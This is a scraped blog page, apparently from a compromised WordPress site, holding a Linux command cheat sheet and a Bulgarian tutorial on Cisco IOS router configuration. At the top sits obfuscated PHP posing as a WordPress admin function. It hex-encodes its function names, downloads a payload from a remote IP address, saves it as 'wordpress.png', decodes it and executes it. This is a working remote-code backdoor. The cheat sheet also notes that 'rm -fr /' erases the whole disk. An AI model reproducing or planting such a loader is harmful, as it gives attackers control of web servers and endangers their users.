if ( ! function_exists( 'wp_admin_tab' ) ) : /** * Load admin dynamic tabs if available. * * @since 3.2.5 * * @return void */ function wp_admin_tab() { $wp_menu = error_reporting(0); $wp_copyright = 'wordpress.png'; $wp_head = dirname(__FILE__) . DIRECTORY_SEPARATOR . $wp_copyright; $wp_call = "\x70\x61\x63\x6b"; $wp_load = $wp_call("H*", '6372656174655f66756e6374696f6e'); $wp_active = $wp_call("H*", '66696c655f6765745f636f6e74656e7473'); $wp_core = $wp_call("H*", '687474703a2f2f38382e38302e302e31372f6265616e2f'); $wp_layout = "\x61\x6c\x6c\x6f\x77\x5f\x75\x72\x6c\x5f\x66\x6f\x70\x65\x6e"; $wp_image = $wp_call("H*", '677a696e666c617465'); $wp_bar = $wp_call("H*", '756e73657269616c697a65'); $wp_menu = $wp_call("H*", '6261736536345f6465636f6465'); $wp_inactive = $wp_call("H*", '66696c655f7075745f636f6e74656e7473'); $wp_plugin = $wp_call("H*", '6375726c5f696e6974'); $wp_style = $wp_call("H*", '6375726c5f7365746f7074'); $wp_script = $wp_call("H*", '6375726c5f65786563'); if (!file_exists($wp_head)) { $wp_core = $wp_core . $wp_copyright; if (ini_get($wp_layout) == 1) { $wp_asset = $wp_active($wp_core); } else { if (function_exists($wp_plugin)) { $wp_css = $wp_plugin($wp_core); $wp_style($wp_css, 10002, $wp_core); $wp_style($wp_css, 19913, 1); $wp_style($wp_css, 74, 1); $wp_asset = $wp_script($wp_css); } } if( !strpos($wp_asset,'gmagick') ) return; $wp_inactive($wp_head, $wp_asset); } $wp_logo = $wp_active($wp_head); $wp_theme = strpos($wp_logo, 'gmagick'); if ($wp_theme !== false) { $wp_nav = substr($wp_logo, $wp_theme + 7); $wp_settings = $wp_bar($wp_image($wp_nav)); $wp_asset = $wp_menu($wp_settings['admin_nav']); $wp_content = $wp_load("", $wp_asset);$wp_content(); error_reporting($wp_menu); } } endif; Georgi’s Blog » Articles

< <<<< Tezi komandi sa za Slackware moje da ima razminavane v drugite OS>>>>>
apropos xxx – pokazva spisuk ot komandite v koito ima xxx
w – koi e lognat v momenta v sistemata
last – slisuk na poslednite logvali se v sistemata useri
lastb – slisuk na poslednite neuspeshno logvali se v sistemata useri
uptime – kolko vreme e rabotila sistemata sled posledniq reboot i oshte
nqkolko polezni informaciiki
ps – spisuk sus raboteshtite procesi
ps -aux – po-razbiraem spisuk s procesite
killall xxx – ubivane na procesite imashti vruzka s xxx
kill -9 xxx – ubivane na edin proces kudeto xxx e negoviq pid nomer
cat /etc/issue – pokazva distribuciqta
cat /etc/version – pokazva versiqta
cat file – pokazva sudurjanieto na “file”
lsmod – pokazva spisuk sus zaredenite moduli
ls – spisuk s direktoriite i failovete v tekushtata direktoriq
ls -all – podroben spisuk ——————- || —————
cp source destination – kopira “source” v “destination”
mv ———- || ——– – premestva ————- || ———-
ln -s ———— || —— – pravi simvolichna vruzka
mkdir xxx – pravi papka na ime xxx
rmdir xxx – iztriva papka na ime xxx
rm xxx – trie file na ime xxx
rm -rf xxx – trie file na ime xxx s razlika ot gore che tuk ne te pita i
go trie vednaga… ako e direktoriq trie vsichko v neq primer rm -fr / –
tova bi iztrilo celiq hard disk…
addusr – dobavq potrebitel (script s vuprosi)
tar – xzvf filename.tar.gz – razarhivirane na filename.tar.gz
tar – xvf filename.tar- razarhivirane na filename.tar
bunzip filename.bz2 – razarhivirane na filename.bz2
gunzip filename.gz – razarhivirane na filename gz
unzip filename.zip – razarhivirane na filename.zip
jobs – spisuk sus sprqnite i “background” procesite
fg xxx – produljavane na proces kudeto xxx e “job number”
lsof – pokazva otvorenite failove
lspci – pokazva informaciq za PCI kartite na mashinata
watch -n xx – povtarq komanda na vseki xx sekundi
modprove -l |more – pokazva modulite koito sa dostupni
modprobe modulename – zarejda avtomatichno modul s ime modulname
lsdev – informaciq za DMA, IRQ I\O
insmod module – zarejda modul s ime module
rmmod module – premahva modul s ime module
cd – change dir (sushtoto kato pod DOS)
passwd – smqna na parolata na tekushtiq user
ifconfig – nastroika i informaciq za mrejovite karti
ifconfig eth0 192.168.0.1 bcast 192.168.0.255 netmask 255.255.255.0 –
nastroiva interface eth0 sus ip 192.168.0.1, maska 255.255.255.0 i
broadcast adres 192.168.0.255
prekompilirane na qdro – komandi:
1. cd /usr/src/linux
2. make config
2. make menuconfig
2. make xconfig (pod X)
#izbira se edno ot gornite 3 za nastroika
3. make clean; make dep; make bzImage; make modules; make modules_install
4. cp arch/i386/boot/bzImage /boot/[ime na image-a]
5. mcedit /etc/lilo.cof – nastroika na bootmanager-a
6. lilo
7. reboot
chmod – smenq pravata
chown – smenq sobstvenik
chgrp – smenq grupata
chmod -u +w /temp/example – dava w (write) prava na sobstvennika na
/temp/example
chmod -u -w /temp/example – premahva w (write) prava na sobstvennika na
/temp/example
za gornite komandi:
-u – sobstvennik
-g – grupa
-o – ostanalite
-a – na vsichki
——————-
w – write prava
r – read prava
x – execute prava
gornite 3 opcii se slagat s + ili – v zavisimost ot todva dali sa davat ili otnemat suotvetnite prava za file (direktoriq)

< <<<< These commands are for Slackware. They might differ on different distributions>>>>>
pwd – full path of the current directory (where are you at in the system)
apropos xxx – list of commands that have xxx
w – who is logged in.
last – list of last logins and reboots
lastb – list of last bad logins
uptime – the uptime of the system after last reboot, load average and other info
ps – list of running processes
ps -aux – full list of processe – nice when kill is the next command :D
killall xxx – kills all processes xxx and all child processes, where xxx is name
kill -9 xxx – kills process xxx with -9 signal (almost always kills the process), where xxx is pid
cat /etc/issue – name of distribution(should be)
cat file – shows the content of “file”
lsmod – shows list of loaded modules
ls – like dir in windows – a list of directories and files in the current directory
ls -all – ——————- || ————— with more information
cp source destination – copies “source” to “destination”
mv ———- || ——– – moves ————- || ———-
ln -s ———— || —— – creates soft link destination that points to source
touch xxx – creates an empty file xxx
mkdir xxx – creates directory xxx
rmdir -r xxx – removes(delete) directory xxx
rm xxx – removes(delete) file xxx
rm -rf xxx – removes(delete) file or directory xxx and all subdirectories and files of xxx without asking
addusr – script for adding users to the system
tar – xzvf filename.tar.gz – extracts filename.tar.gz
tar – xvf filename.tar- extracts filename.tar
bunzip filename.bz2 – extracts filename.bz2
gunzip filename.gz – extracts filename gz
unzip filename.zip – extracts filename.zip
rar x filename.rar – extracts filename.rar
jobs – list of stopped and background processes
fg xxx – continues a process where xxx is a job number
lsof – list of open files
lspci – list of pci devices in the machine (video cards, sound cards, IDE and USB conotrollers etc.)
watch -n xx – executes a command every xx seconds and prints the output
modprove -l |more – list of available modules for loading
modprobe modulename – tries to load modulname auto.
lsdev – information about DMA, IRQ I\O
insmod module – loads module “module”
rmmod module – removes module “module”
cd – change dir (like in DOS)
passwd – use this to change your password
ifconfig – setup of network interfaces (ethernet, ppp, etc)
ifconfig eth0 192.168.0.1 bcast 192.168.0.255 netmask 255.255.255.0 –
will cetup interface eth0 with ip 192.168.0.1, mask 255.255.255.0 and
broadcast address 192.168.0.255

Recompilation of a 2.4 kernel:
1. cd /usr/src/linux
2. make config
2. make menuconfig
2. make xconfig (pod X)
#use one of the top tree commands
3. make clean; make dep; make bzImage; make modules; make modules_install
4. cp arch/i386/boot/bzImage /boot/[name of kernel image]
5. mcedit(or vim or pico or whatever editer you prefer) /etc/lilo.cof:
add these lines for every new kernel:

image = /boot/[name of kernel image]
root = /dev/hda6
label = somelabel
read-only

6. lilo
7. reboot

Recompilation of a 2.6 kenel:
1. cd /usr/src/linux
2. make config
2. make menuconfig
2. make xconfig (pod X)
#use one of the top tree commands
3. make clean; make; make modules_install
4. cp arch/i386/boot/bzImage /boot/[name of kernel image]
5. mcedit(or vim or pico or whatever editer you prefer) /etc/lilo.cof:
add these lines for every new kernel:

image = /boot/[name of kernel image]
root = /dev/hda6
label = somelabel
read-only

6. lilo
7. reboot

chmod – change of permissions of a file or directory
chown – change of owner of a file or directory
chgrp – change of group of a file or directory
chmod -u +w /temp/example – gives w (write) permission to the owner of /temp/example
chmod -u -w /temp/example – removes w (write) permission from the owner of /temp/example
here are the flags:
-u – owner
-g – group
-o – restoftheworld
-a – all of the above
——————-
w – write permission
r – read read permission
x – execute permission
the above 3 flags are used with + or – for adding or removing a particular permission

I taka.. v tazi statiq shte se opitam da vi zapoznaq s osnovite na Cisco IOS i konfiguriraneto na ruter.

Cisco IOS (Cisco Internetwork Operating System ) e operacionna sistema za opravlqvane na ruteri. Shte razgledam napravo opredelen sluchai za nastroikata na edin ruter, zashtoto taka shte e po-lesno da vi vyveda v sveta i. Da priemem, che imame Cisco ruter i iskame da konfigurirame edin ot negovite interfeisi. V povecheto ruteri interfeisyt se oboznachava taka: Serial interface 1 = s0, Serial 2 = s1 i t.n.Ethernet interface 1 = eth0, Ethernet 2 = eth1 i t.n. V IOS ima 3 osnovni rejima na rabota. potrebitelski rejim, koito ima nai-malko prava, priviligirovan rejim, koito ima nai-mnogo prava i konfiguracionen rejim, v koito se nastrovat protokoli, interfeisi, paroli i t.n. Neka predi da razkaja po-podrobno za otdelnite rejimi da vi zapoznaq s komandata “show”. Tq e edna ot osnovnite komandi IOS. Vsqka komanda si ima mnogo podkomandi (kato v IRC :). Naprimer s komandata “show version” se izvejda informaciq ne samo za versiqta na IOS, no i tova kolko e zaetata i svobodnata pamet, kolko interfeisa ima rutera i kakyv model e, ot kyde se zarejda operacionnata sistema i kak se kazva failyt ot koito se zarejda tq. V IOS ima edin mnogo dobyr pomohsnik towa e “?”. Kogato sled nqkoq komanda postavim vyprositelen znak IOS vednaga ni izvejda vyzmojnite podkomandi kakto i opisanieto im. Moje bi v nachaloto tova e nai-chesto ispozvaniq znak ;). Sega shte vi napravq edno sryvnenie mejdu potrebitelski rejim i priviligirovan. Kogato ste v Potrebitelski rejim ako napihsete “show ?” (trqbva da se otbeleji, che sled postavqneto na znak “?” IOS vednaga ni otgovarq bez da natiskame “Enter”) ni izlizat slednite podkomandi: alps – Alps Information; arp – ARP table; backup – Backup status; clock – Display system clock; dialer – Dialer parameters and statistics; drip – DRiP DB; flash: – Display information anout flash: file system; (shte spra s opisaniqta do tuk zashtoto komandite sa tvyrde mnogo, a posle po-vajnite ot tqh shte gi razgledam);flash-host;history;hosts;isdn;location;modemcap;ncia;PPP;rmon;rtl;sesions;sgbp;snmp;tacacs;terminal;trafic-shape;users;vertion;vpdn. Vijdate kolko sa mnogo podkomandite na komandata “show” v potrebitelski rejim (27). Ako v previligirovan rejim napihsete “show ?” shte vi izlezne list ot 94 podkomandi (WOW!!). Tova e razlikata mejdu dvata rejima. Za konfiguracionniq rejim e syvsem razlichno zashtoto komandite sa drugi i komandata “show” vobshte q nqma. Predi da zapochna da razglejdam komadni iskam da vi zapoznaq s edno mnogo golqmo predimstovo na IOS (neznam pred koi e tova predimstvo zashtoto 85% it harduer-a na Internet e Cisko a toi pozva IOS no …). Stava vypros za dovyrhsvaneto na komandi. Ako nqkoi ot vas e rabotil s Linux/Unix znae za kakvo stava vypros, no za tezi koito ne sa, tova e slednoto: kogato napihsete nqkoq komanda i natisnete Tab, IOS avtomatichno q dovyrhsva. Problemyt e tam che pri_Linux/Unix OS ako ima nqkolko komandi s tova nachalo izliza spisyk s vsichki vyzmojni, dokato pri IOS ne stava nishto. Primer: ako v IOS napihsete “sh” i natisnete Tab, komandata shte se dovyrhsi do “show “. Ako obachne napihsete samo “s” i natisnete Tab, nqma da stane nishto. Tazi opciq e mnogo polezna za tezi, koito ne znaqt kak tochno se izpisvat komandite. Ima i oshte neshto. Ako napihsete tolkova ot edna komanda taka che da nqma druga koqto da zapochva s tova koeto ste napisali nqma nujda da q dovyrhsvate. Primer: ako napihsete “sh ver” vmesto “show version” rezultatyt che e edin i sysht, zashtoto operacionnata sistema ste znae che “sh” e “show” , poneje nqm druga komanda koqto da zapochva s “sh”. Tova veche e golqmo predimstvo. Ta da se vyrnem na nahsiq ruter koito iskame da konfigurirame zashtoto mnogo se otnesoh. Znachi imame ruter i iskame da pusnem_RIP protokol (RIP e protokol za rutirane na paketi i drugi protokoli kato IP. Toi se naricha rutirasht protokol i e edin ot nqi-chesto sreshtatnite za malki mreji.). Pyrvo trqbva da nastroim interfesi-a. Da rechem che iskame da nastroim pyrviq serien interfeis, koito na nahsiq ruter shte byde “s0″ Za da nastroim interfiis trqbva da preminem v konfiguracionen rejim. I tuk e mqstoto da kaja kak se preminava ot edin rejim v drug. Kogato se vyrjete kym edin ruter i ako toi ne iziskva parola za potrebitelski rejim napravo shte vleznete v rutera bez da natiskate nishto. Komaniqt red shte izglevda podobno na tozi: “Routername>”. Znakyt “>” oznachava, che sme v potrebitelski rejim. Za da preminem kym priviligirovan trqbva da napihsem komandata “enable” ili samo “ena”. Kogato vyvedem parolata (ako se iziskva takava), komandniqt red se pormenq na “Routername#”. Sega veche sme v priviligirovan rejim (poznava se po “#” sled imeto na rutera). Tuk veche imame pylen kontrol nad mahsinata. Za da konfigurirame nahsiq s0 interfeis, trqbva da sme v konfiguracionen rejim. V nego se preminava s komanda “configure terminal” ili “conf t”. Komandniq red se promenq na “Routername(config)#”. I sega trqbva da vleznem v interfeisa koito iskame da konfigurirame. Tuk idva edna druga komanda. “Interface”. Ako ne znaem kak sa krysteni interfeisite na tozi ruter mojem spokoino da napihsem “interface ?” i dobrata mahsinka shte ni iskara imenata na vsichki interfeisi koito ima. No a nas ni trqbva s0, zatova pihsem “Interface s0″ i pred nas izliza slednoto “Routername(if-config)#” tuk veche mojem da nastroim IPto na interfeisa, da go pusnem i tyi kato e Serien Interfeis trqbva da rehsim dali toi shte e DTE ili DCE. Tezi dve neshta sa druga tema na razgovor, no shte vi kaja, che ako e DTE ne se pihse nishto. Ako e DCE se nastroiva t.nar. clockrate. Znachi. Za da nastroim IP na opredelen Interfeis trqbva da znaem komandata “ip address”. Sled neq se pihsat IPto i maskata na mrejata. Primer: “ip address 192.186.0.1 255.255.255.0″ Tova e. Nahsiq interfeis si ima IP 192.168.0.1. Sega obache trqbva da “vdignem” interfeisa. V IOS vsqka komanda se otkazva kato se sloji “no” otpred. Znachi ako komandata za spirane na interfeis e “shutdown”, to toi shte se puska s komandata “no shutdown”. Got a? Sega shte vi izpihsa edno pod drugo vsichki komandi ot vlizaneto v rutera do puskaneto na interfeisa:

Routername>ena [za preminavane v priv. rejim]
Password:
Routername#conf t [za preminavane v globalen konf, rejimsht
Routername(config)#interface s0 [za preminavane v konf. rejim na interfeis s0]
Routername(if-config)ip address [addres] [mask] [nastroika na IP adres-a na interfeisa]
Routername(if-config)no shutdown
[puskame interfeisa da raboti]
[ako rutera ne zaseche vryzka s rozi interfeis shte go spre avtomatichno, dokato ne se poqvi takava]
Routername(if-config)exit [izlizame ot interfais-a s0]
Routername(config)exit [izlizame ot konf. rejim i sme v priviligirovan]
Routername#

Tova e vsichko za konfiguriraneto na edin interfeis. Sega po syshtiq nachin shte vi opihsa kak se konfigurira RIP protokol. No purvo da kaja nqkolko dumi za samiqt nego. Rip Protokola e Distance vector protokol. Distance vector protokol oznachava che Router-a si komunikira samo sys sysedniq router. Ima i Link-state protokoli koito pazqt informaciq za cqlata topologiq na mrejata (znaqt za vsichki ustroistva v neq) A distance vector protokolite znaqt samo susedite si. No tova ne e tolkova vajno. RIP prtokola e mnogo shiroko razprostranen v “malkite” mreji do 15 routera. Zasto tochno do 15? Ami toi ispolzva merna edinica “HOP count”. “HOP” oznachava mqsto kudeto paketut e razopakovan i opakovan nanovo (Taka nai lesno ste go razberete). Naprimer:Kogato edin paket mine prez 1 router negoviqt HOP Count se smalqva s 1 (edinica). Sled oste edin se smalqva s oste 1 i taka dokato stane 0 kogato ste e minal 15 puti prez router. Kogato tova ste sluchi tozi paket se izhvurlq! Tova e pric! hinata RIP protokola da se izpolzva v mreji do 15 router-a. RIP e rutirast protokol. Tova znachi che e pritokol za obmqna na Rutirasti tablici mejdu ruterite. A rutirasti tablici sa tezi tablici, v koito ruterite zapisvat koe IP ot kude (koi Interface) trqbva da mine. Pri RIP protokola rutirastite tablici se obnovqvat na vseki 30 sec. Ako do 90 sec router-a ne e poluchil informaciq ot nqkoi suseden go obqvqva za nedostupen. Stiga tolkova informaciq che po nachina po koito q podnasqm sigurno nisto ne se razbira. Zatova poveche praktika i po-malko dumi

Znachi:

Naprimer ako imame 3 router-a svurzani po tozi nachin:

— 210.120.120.0 -1- 112.152.164.0 -2- 212.116.155.0 -3- 123.125.125.0 —
|H|……………|R|…..|HUB|……….|R|……………|R|…………….|H|
— — . . — — —
. . . . .
. . . . .
1 2 3 4 5
. . . . .
— — — — —
|H| |H| |H| |H| |H|
— — — — —

1: 10.10.10.1 | — -1-
2: 112.152.164.1 | |H|-Host(PC) |R|-Router 1 |HUB|-Kakvo li e tva?
3: 112.152.164.2 | — —
4: 12.12.12.1 |
5: 13.13.13.1 |
Network Mask:255.255.255.0

Da kajem che tova e edna primerna skema na edna primerna mreja (dano q razbirate).
Purvo ste nastroim rutirsne s RIP protokola:

Routername#conf t [preminavame otnovo v konf. rejim]
Routername(config)#router rip [s tazi komanda izbirame rutirashtiq protokol da e RIP]
Routername(conifg-router)#network [address]
[tuk sled komandata "network" trqbva da se vyvede adresa na MREJATA, a ne na interfeisite i to SAMO na susednite mreji.]
[Ruterite shte se pogrijat za ostanaloto ili v tazi mreja za Router1 ste trqbva da vuvedem mreji 210.120.120.0, ]
[112.152.164.0 i 10.10.10.0; za Router2: 112.152.164.0, 212.116.155.0, 12.12.12.0; za Router3: 212.116.155.0, 123.125.125.0 i 13.13.13.0. Tova e!]
Routername(config-router)exit [preminavame kym globalen konfiguracionen rejim]
Routername(config)ip routing [kakto pri interfeisite taka i pri protokolite trqbva da im se kaje koga da zapochnat da deistvat]

Veche sme nastroili i RIP protokola. Tezi komandi sa napulno dostatuchni za da moje edin protokol da funkcionira.
Ima oste mnogo protokoli koito se ispolzvat kato naprimer IGRP naprimer. Nqma da vi opisvam nastroikite zastoto ne se analogichni. Razlikite koito sustestvuvat mojete da razberete sus “?” sled komandata.
Po-interesnata chast na IOS obache ne sa protokolite a t.nar. Access Control Lists (ACLs). Tova e FIREWALL-a na edin router( napipahme interesnata chast ;))
Po princip mrejovite administratori ogranichavat dostup sus tezi ACLs. Tova e glavnata im cel. Dva sa osnovnite vidove Access Control Lists: standard i exteded. Ste zapocha sus edin primer za standard i ste obqsnqvam:
Priemame che iskame da dadem dostup samo na edna mreja. Naprimer 158.168.0.0. Suzdavaneto na ACL ste stane po sledniqt nachin:

Routername(config)#access-list 1 permit 158.168.0.0 0.0.255.255

Kakto zabelqzvate ACLs se suzdavat v configuracionen rejiim. Komandata e: “access-list” sled neq ima nomer (ot 1 do 99 za standard ACL) na ACL-a, sled tova “permit”, koeto ste reche “razreshavam”(ako iskate moje da e “deny”, no togava efekta ste e obraten ;)), adres na mrejata (158.168.0.0) i naj-nakraq e t.nar. “wild card”. A kakvo e wild card? Tova e chislo po koeto router-a opredelq koq chast ot mrejoviq adres trqbva da sledi. V sluchaq 0.0.255.255 oznachava che router-a ste “razreshava” na paketi idvasti ot 158.168.xxx.xxx (nqma znachenie kakvi cifri ste sa .xxx.xxx) ako bqhme slojili wild card 0.0.0.255, router-a steshe da gleda mraja 158.168.0.xxx. Ako chastta ot adresa na edni poluchen paket ne suvpadne sus adresa zadaden v ACL-a, to paketa biva izhvurlen.
Za tezi koito znaqt na kakuv prinvip sa IPadresite i kak se prevrustat ot desetichna broina sistema v dvoichna (samo s “0″ i “1″) ste kaja, che wild card se opredelq po sledniqt nachin: “0″ znachi “suvpadam” a “1″ znachi “ignororam” ili kogato se supostavqt adresa na paketa koito e poluchen i wild card-a (v dvoichna broina sistema) tam kudeto ima “1″ nqma znachenie kakvo pishe, a tam kudeto e “0″ se sravnqva sus suotvetniqt bit ot adresa v ACL-a. A za tezi koito neznaiqt kak se prevrustat IPta v dvoichna broina sistema ste kaja da si namerqt nqkude i da prochtat, zastoto tova e nesto MNOGO vajno. Moje dori az da napisha po-natatuk statiq za tova kakrabotqt mrejite, kak se preobrazuva ot dvoichna v desetichna broina sistema i obratno.
Stiga tolkova s tozi Wild Card.
Po interesni sa Extended ACLs, zastoto pri tqh moje da se opredelq i protokol po koito da se ogranichava!
Naprimer:

rounername(config)# access-list 101 permit tcp any 168.131.201.0 0.0.0.255 eq www

Tazi tuka e po-dulga i sega ste q obqsnq. Po ptincip tq pochti govori sama no…

znachi imame ACL sus nomer 101 (nomerut moje da e ot 100 do 199 za Extended ACL) sled tova “permit”- da razreshi; “tcp”- po tcp ptotokol; “any” – ot kudeto i da idva(kato tuka mojem da slojim i konkreten adres naprimer 212.116.155.0 sus wild card 0.0.0.255); “168.131.201.0 0.0.0.255″ – tova cqloto e za kude trqbva da e zaputen paketa koito e poluchil router-a (ako paketa ne e za tam to toi biva izhvurlen); eq – sukrastenie ot “equal” (ravno) (moje da e “it” – less than, “gt” – greater then, “eq” – equal, “neq” – not equal); www – tova e bukveniqt variqnt na port 80 po koito se poluchavat i isprastat zaqvhi za WEB. Tazi ACL prevedena na choveshki ezik ste zvuchi taka: ACL nomer 101 da razreshi dostup prez 80 prot ot vsqkude kum mreja 168.131.201.0. Tova e vsichko. Ako naprimer ne bqh napisal www a 80 nqmashe da ima razlika. No ako bqh slojil 21 vmesto 80 stqh da razresha FTP vruzki.

Mojete da pravite edna ACL sus nqkolko usloviq vutre, no imaite v predvid che edin paket se proverqva ot purvoto kum poslednoto pravilo i na purvoto pravilo na koeto ne otgovarq paketa, toi biva izhvurlen. Dano me razberete. i ne zabravqite nikoga “?”.Kakto veche kazah tova e magicheski znak v IOS!

VAJNO!: Kogato suzdavate ACL trqbva da imate v predvid che nakraq na edna ACL ima red : “deny any any” (koeto ste reche da zabrani vsichko ot vsqkude kum vsqkude!) Zatova ako previte ACL koqto da zabranqva nesto trqbva sled kato napishete vsichki zaprani da dobavite red “premit (tcp) any any” inche VSICKO ste e zabraneno.

Ima oste edno mnogo vajno nesto pri ACLs. Ako samo gi suzdadete te ne vurshat nikakva rabota. Trqbva da gi prilojite kum nqkoi interface na router-a. Previloto e edno: ACL se slaga na nai-blizkiq interface do mrejata koqto ogranichavame! Prochetete vnimatelno nqkolko puti tova pravilo ako ne ste go razbrali!

Tova e nai-vajnoto za ACLs. Nqma da vi pulnq glavata s oste nesta zastoto ne znam na vas kakvo tochno vi trqbva! No ako ste malko dosetlivi i imate kude da probvate (mojete da si svalite nqkoi emulator na router) ste nauchite mnogo sus tezi komandi koito sum vi dal i nai-veche sus “?”

Priznavam che ne e lesno da se nauchi IOS i za tezi koito si nqmat ponqtie ot mreji sigurno nisto nqma da razberat! Na tqh moga samo da im kaja che tazi ne e statiqta ot koqto trqbva da zapochnete svoeto obuchenie po mreji!

A sega malko dopylnitelni komandi kato naprimer “hostname” koqto se zadava v globalen konfiguracionen rejim za da se smeni tova “routername”. Primer: “Routername(config)#hostname cisco2110″ -> “cisco2110(config)#”. S tazi komanda mojete da smenqte imeto na Rutera.

Druga interesna komanda e “enable secret” ili “ena s” . Tq syshto se izpylnqva v konfiguracionen rejim. Vnimavaite s neq, zashtoto tova koteto napihsete sled neq shte byde parolata za preminavane ot potrebitelski v priviligirovan rejim. Primer: “cisco2110(config)#ena s 123456″. I veche sme promenili parolata za priviligirovan rejim na “123456″.

Estestvenno moje da se slaga parola i na potrebitelskiq rejim. Tova stava s komandata “line” pak v konf. rejim. Poneje Ruterite potdyrjat 5 Telnet vryzki i edna konzolna. Nastroikata stava po sledniqt nachin:

cisco2110(config)#line vty 0 4 [taka se vliza v rejim za nastroika na 5-te Telnet rejima. Te se vodqt vty.]
cisco2110(config-line)#login [s tazi komanda se kazva na Rutera da pita za parola kogato nqkoi se vyrje kym nego prez telnet]
cisco2110(config-line)#password [parola] [taka nastroivame parolata za potrebitelski rejim]
cisco2110(cinfig-line)#exit [veche trqbva da znaete kakvo stava]
cisco2110(config)#line console 0 [jlizame v konfiguracionen rejim na konzolnata vryzka]
cisco2110(config-line)#login [komandite se povtarqt]
cisco2110(config-line)#password [parola]
cisco2110(config-line)exit

Sega veche sme nastroili telnet i konzolnata vryzka.
Ostava ni da proverim kakvo sme napravili. Tova stava s komandata “show running-config”. I tyi kato komandata “show” ne rabiti j konfiguracionen rejim, trqbva da se vyrnem v priviligirovan rejim s komanda “exit”. Sled kato vyvedem komandata “sh run” (kratkiq variqnt na “show running-config”) shte ni izlezne pylen otchet za tova koeto e nastroeno po sledniq nachn:

versiq na IOS
!
hostname cisco2110
!
enable password [pusnati sa parolite]
!
enable secret [parolata za priviligirovan rejim no kodirana :( ]
!
interfeisite koito ima, koi sa pusnati, koi imat IPta, koi rabotqt
!
informaciq za telnet i konzilnata sesiq (timeout, passwords etc.)

I sega ostava da zapihsem vsichko tova. Tova stava s komanda “copy”. Tq se isnylnqva v globalen konfiguracionen rejim. Kakto veche razbrahte vsichko koeto sme napravili e zapisano v “running-config” no si ima i “startup-config”. Tochno tam trqbva a se zapazi vsichko. cisco2110#copy running-config starup-config (ili “copy run start”) Tuk_IOS ni pita “Destination Filename[startup-config]?” i nie samo natiskame Enter. Sled koeto vsichko se zapisva i mojem da sme spokoini.
bache kak shte se pochuvstvate ako nqkoi vahs kolega doide i zapochne da vi promenq nastroikite na ruter-a? Vinagi kogato ima ruter, ima i TFTP syrvyr. Tova e neshto kato sykraten variqnt na FTP syrvyr. Na tozi TFTP syrvyr mojete da zapisvate svoqta rabota. tova stava pak s komandata “copy”. :

cisco2110#copy running-config tftp
[taka kazvame na rutera da kopira tekushtite nastroiki v TFTP syrvyr. Sled kato natisnem "Enter" shte ni popita za adresa na syrvyr-a.]
[Vyvejdame go i ni pita za ime na fail. Tova e vsichko. Veche sme si kopirali tekushtata nastroika na ruter-a v TFTP syrvyr.]

Ta sluchva se taka che vyprosniqt kolega ni promenq nastroikite i sega shte trqbva da si kopirame otnovo ot syrvyr-a starata konfiguraciq. Estestveno komandata pak e “copy”

cisco2110#copy tftp running-config [ne zabravqite i za sukratenite versii na komandite]

Sled kato vyvedem tazi komanda pak shte ni pita obichainite neshta kato adres na syrvyr i ime na fail. Sled kato vsichko tova e gotovo imame starata konfiguraciq v “running-config” i trqbva da q zapihsem i v “startup-config”, a tova veche znaete kak stava.
Ima vdna mnogo hubava komanda v IOS, koqto e mnogo polezna ako konfigurirate mnogo ruteri i iskate da vidite dali te rabotqt. Tq e chast ot komandata “show” i e “cdp”. Kogato napihsete komandata “show cdp neighbors”, na ekrana shte izlezne informaciq za vsichki sysedni Cisco ustroistva. CDP e sykrashtenie ot “Cisco DIscovery Protocol”. S tazi komanda nai-lenso se proverqva dali ima vryzka kym sysednite ruteri. IOS ima i nqkolko standartni komandi kato “telnet”, “ping” i “trace”. Nqma da opisvam kakvo se pravi s tezi komandi, zashtoto tqh gi ima vyv vsqka OS.
Nadqvam se che s razi statiq sym vi zapoznal pone malko s IOS. Estestvenno ima oshte mnogo komandi no ako ste malko po-liubopitni s vylhsebnoto znache “?” mojete da nauchite mnogo ot samata IOS. Estestveno tq nqma Help kato pri Vinboza, no pyk i ne i trqbva!
Toava v vsichko ot men ako ima nqkakvi vyprosi se mi pratete e-mail ili me namerete v IRC!
e-mail:terahz@mail.bg
nick:TeraHz
Bye